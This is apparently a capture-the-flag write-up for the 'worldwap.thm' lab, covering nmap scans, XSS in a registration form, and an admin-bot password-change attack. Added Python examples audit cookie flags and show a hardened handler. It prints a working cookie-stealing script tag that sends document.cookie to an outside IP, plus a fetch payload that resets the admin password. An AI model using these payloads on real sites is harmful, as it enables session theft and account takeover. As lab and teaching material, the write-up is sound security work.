Port scanning

└─# nmap --min-rate=10000 -p- worldwap.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-04 08:31 UTC
Nmap scan report for worldwap.thm (10.10.174.96)
Host is up (0.0086s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8081/tcp open blackice-icecap
MAC Address: 02:A6:09:94:BB:73 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.43 seconds
└─# nmap -sT -sV -sC -O -p22,80,8081 worldwap.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-04 08:32 UTC
Nmap scan report for worldwap.thm (10.10.174.96)
Host is up (0.00043s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e35ef635600d88cc9f808ec8518eb0bf (RSA)
| 256 eab85205644099b134426cc3f7ce7f1e (ECDSA)
|_ 256 ee6afc284d3c5c619d313482ecfa1316 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-title: Welcome
|_Requested resource was /public/html/
|_http-server-header: Apache/2.4.41 (Ubuntu)
8081/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 02:A6:09:94:BB:73 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 3.8 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.70 seconds
└─# nmap --script=vuln -p22,80,8081 worldwap.thm 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-04 08:33 UTC
Nmap scan report for worldwap.thm (10.10.174.96)
Host is up (0.00028s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
| /phpmyadmin/: phpMyAdmin
| /api/: Potentially interesting folder
|_ /public/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
8081/tcp open blackice-icecap
MAC Address: 02:A6:09:94:BB:73 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 31.15 seconds
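
The `httponly flag not set` finding on PHPSESSID in the scan above is what later lets a script read `document.cookie`. The following Python is an added example, not code from the room or from the original writeup: it parses Set-Cookie header values (constructed samples, not captured from the target) and reports which attributes a session cookie is missing, next to a helper that emits the hardened form. One caveat worth keeping in mind: HttpOnly only stops script from reading the cookie; a script running in the same origin can still make requests that carry it, so it is a mitigation for cookie theft, not for XSS itself.

```python
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed sample headers (not captured from worldwap.thm). The first
# mirrors the nmap finding: a PHP session cookie with only Path set.
SAMPLE_HEADERS = [
    "PHPSESSID=constructedsessionidvalue; path=/",
    "theme=dark; Path=/; SameSite=Lax",
]

# Cookie names treated as session identifiers (assumed list).
SESSION_COOKIE_NAMES = {"phpsessid", "jsessionid", "sessionid", "session"}


@dataclass
class CookieAudit:
    name: str
    is_session: bool
    missing: List[str] = field(default_factory=list)


def parse_set_cookie(header: str) -> Dict[str, object]:
    """Split 'name=value; Attr; Attr=val' into name, value and a
    lower-cased attribute map (attribute names are case-insensitive)."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def audit_cookie(header: str, https: bool = True) -> CookieAudit:
    """Report the attributes a session cookie should carry but does not."""
    cookie = parse_set_cookie(header)
    attrs = cookie["attrs"]
    missing = []
    if "httponly" not in attrs:          # script can read document.cookie
        missing.append("HttpOnly")
    if https and "secure" not in attrs:  # cookie would also go over plain HTTP
        missing.append("Secure")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        missing.append("SameSite=Lax/Strict")
    name = cookie["name"]
    return CookieAudit(name, name.lower() in SESSION_COOKIE_NAMES, missing)


def hardened_set_cookie(name: str, value: str, https: bool = True) -> str:
    """Build the Set-Cookie value a session cookie should be issued with."""
    parts = [f"{name}={value}", "Path=/", "HttpOnly", "SameSite=Lax"]
    if https:
        parts.append("Secure")
    return "; ".join(parts)


def audit_headers(headers: List[str], https: bool = True) -> Dict[str, List[str]]:
    """Map cookie name -> missing attributes, for session cookies only."""
    audits = (audit_cookie(h, https) for h in headers)
    return {a.name: a.missing for a in audits if a.is_session}


if __name__ == "__main__":
    for name, missing in audit_headers(SAMPLE_HEADERS).items():
        print(f"{name}: missing {', '.join(missing) or 'nothing'}")
    print(hardened_set_cookie("PHPSESSID", "constructedsessionidvalue"))
```

Feed it the Set-Cookie values from a real response (for example from `curl -i`) to get the same verdict nmap's http-cookie-flags script gives, plus the Secure and SameSite checks that script does not make.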

moderator

Two web ports are open, 80 and 8081, but port 8081 serves a blank page, which is probably a name-resolution (virtual host) issue. Fuzzing subdomains with ffuf, however, turns up nothing.

Looking at the site on port 80 first: it lets you register an account.

After registering, you have to visit login.worldwap.thm to log in, so add that name to the hosts file.

Visiting http://login.worldwap.thm/login.php confirms that this is the web service on port 8081, but oddly the credentials just registered do not work there.

Scanning a few directories turns up nothing. Following the room's hint to start from JS and manipulate cookies, the guess is XSS. Back on the registration page: the site owner reviews the registration details.

Start a cookie stealer and enter the following in the registration form:

<script>new Image().src="http://10.11.77.28:8888/?"+document.cookie;</script>

After a while, the local server receives the cookie: 70b6878pmoj2c5dgglddmc8smf

After swapping in that cookie, visiting the main page redirects to dashboard.php, and visiting login.worldwap.thm/login.php shows we are now logged in as the moderator.

admin

But there still seems to be an admin account to obtain. The changepassword feature can only be used by the admin, and there is a chat page with an admin bot that we can apparently interact with. Sending the earlier XSS payload again shows that a blacklist filter is in place.

<script>fetch('/change_password.php',{method:'POST',headers:{'Content-Type':'application/x-www-form-urlencoded'},body:"new_password=admin"});</script>

This makes the bot go straight to the change-password endpoint and set the password to "admin".

Log out of the current user, log in as admin: success!
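
Both steps of this chain rely on server-side gaps: the registration details are rendered to the moderator unescaped, and change_password.php accepts a bare POST of `new_password` from any authenticated session, so a script running in the bot's browser can reset the password without knowing anything. The following Python is an added example, not the room's code, simulating the two handlers with in-memory stores (the user, password and session values are constructed; only the login.worldwap.thm hostname comes from the writeup, and the scheme is assumed). It escapes details at render time, ties a CSRF token to the session, checks the Origin header, and, because a same-origin script could still read the token, also requires the current password, which is the one thing the injected script does not have.

```python
import hashlib
import hmac
import html
import secrets
from typing import Dict, Optional

# In-memory stores standing in for the app's database and PHP session
# storage (constructed; not the room's code).
USERS: Dict[str, dict] = {}      # username -> {"pw_hash", "details", "role"}
SESSIONS: Dict[str, dict] = {}   # session id -> {"user", "csrf"}

SITE_ORIGIN = "http://login.worldwap.thm"   # hostname from the writeup; scheme assumed


def _hash(password: str) -> str:
    # Illustrative only; a real app should use a slow KDF such as bcrypt or argon2.
    return hashlib.sha256(password.encode()).hexdigest()


def register(username: str, password: str, details: str) -> None:
    """Store registration details raw; escaping happens at render time."""
    USERS[username] = {"pw_hash": _hash(password), "details": details, "role": "user"}


def render_details_for_moderator(username: str) -> str:
    """The review page the moderator sees. html.escape() turns a stored
    <script> tag into literal text, so it never runs in the moderator's browser."""
    return f"<td>{html.escape(USERS[username]['details'])}</td>"


def login(username: str, password: str) -> Optional[str]:
    """Return a fresh session id (with a per-session CSRF token) on success."""
    user = USERS.get(username)
    if user is None or not hmac.compare_digest(user["pw_hash"], _hash(password)):
        return None
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": username, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token(sid: str) -> str:
    """Token embedded as a hidden field in the change-password form."""
    return SESSIONS[sid]["csrf"]


def change_password(sid: str, form: Dict[str, str], origin: str) -> bool:
    """Hardened handler: a bare POST of {"new_password": "admin"} is rejected."""
    sess = SESSIONS.get(sid)
    if sess is None:
        return False
    if origin != SITE_ORIGIN:                         # cross-site form post
        return False
    if not hmac.compare_digest(form.get("csrf_token", ""), sess["csrf"]):
        return False                                  # request did not come from our form
    user = USERS[sess["user"]]
    # Same-origin script (an XSS) can read the token, so also demand a secret
    # the page itself does not hold: the current password.
    if not hmac.compare_digest(user["pw_hash"], _hash(form.get("current_password", ""))):
        return False
    new = form.get("new_password", "")
    if len(new) < 12:                                 # minimum length; value assumed
        return False
    user["pw_hash"] = _hash(new)
    sess["csrf"] = secrets.token_urlsafe(32)          # rotate the token after use
    return True


if __name__ == "__main__":
    register("alice", "correct horse battery", "<script>alert(1)</script>")
    print(render_details_for_moderator("alice"))
    sid = login("alice", "correct horse battery")
    print(change_password(sid, {"new_password": "admin"}, SITE_ORIGIN))
    print(change_password(sid, {"csrf_token": csrf_token(sid),
                                "current_password": "correct horse battery",
                                "new_password": "a new long passphrase"}, SITE_ORIGIN))
```

The ordering of the checks matters less than their independence: the Origin and CSRF checks stop cross-site requests, output escaping stops the script from running at all, and the current-password requirement limits the damage if the first two layers are ever bypassed by a same-origin script.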

Closing thoughts

A new way of using XSS learned.